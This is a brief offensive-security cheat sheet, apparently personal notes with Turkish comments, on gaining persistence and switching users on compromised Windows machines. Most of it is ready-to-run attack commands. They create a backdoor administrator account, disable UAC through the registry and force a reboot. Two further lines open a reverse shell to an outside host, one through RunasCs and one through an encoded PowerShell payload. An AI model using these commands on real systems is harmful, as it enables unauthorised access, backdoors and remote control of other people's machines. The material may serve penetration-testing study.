Windows Persistence
SMB Persistence
net user hacker password123! /add
net localgroup administrators hacker /add
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
shutdown /r /t 0Kullanıcı Değiştirme
# Sadece GUI varsa olur o yüzden Remote Desktop Users grubunda birini bul
runas /user:backupadmin cmd
# Gui Yoksa
.\RunasCs.exe administrator password123 powershell.exe -r 192.168.1.2:1234Process Reverse Shell
Start-Process powershell -ArgumentList "-NoProfile -EncodedCommand BASE64_REV"UAC Bypass

RDP Persistence
Last updated